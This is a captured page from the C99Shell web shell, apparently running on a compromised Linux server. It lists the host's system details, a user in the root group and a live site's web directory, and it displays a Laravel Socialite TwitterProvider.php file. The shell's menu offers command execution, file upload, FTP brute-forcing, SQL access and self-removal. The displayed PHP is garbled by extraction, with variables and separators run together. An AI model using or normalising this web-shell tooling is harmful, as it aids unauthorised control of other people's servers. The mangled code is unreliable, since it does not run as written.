!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/laravel/socialite/src/One/   drwxr-xr-x
Free 28.5 GB of 117.98 GB (24.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     TwitterProvider.php (1.3 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Laravel\Socialite\One;

class 
TwitterProvider extends AbstractProvider
{
    
/**
     * {@inheritdoc}
     */
    
public function user()
    {
        if (! 
$this->hasNecessaryVerifier()) {
            throw new 
MissingVerifierException('Invalid request. Missing OAuth verifier.');
        }

        
$user $this->server->getUserDetails($token $this->getToken(), $this->shouldBypassCache($token->getIdentifier(), $token->getSecret()));

        
$extraDetails = [
            
'location' => $user->location,
            
'description' => $user->description,
        ];

        
$instance = (new User)->setRaw(array_merge($user->extra$user->urls$extraDetails))
                ->
setToken($token->getIdentifier(), $token->getSecret());

        return 
$instance->map([
            
'id' => $user->uid,
            
'nickname' => $user->nickname,
            
'name' => $user->name,
            
'email' => $user->email,
            
'avatar' => $user->imageUrl,
            
'avatar_original' => str_replace('_normal'''$user->imageUrl),
        ]);
    }

    
/**
     * Set the access level the application should request to the user account.
     *
     * @param  string  $scope
     * @return void
     */
    
public function scope(string $scope)
    {
        
$this->server->setApplicationScope($scope);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--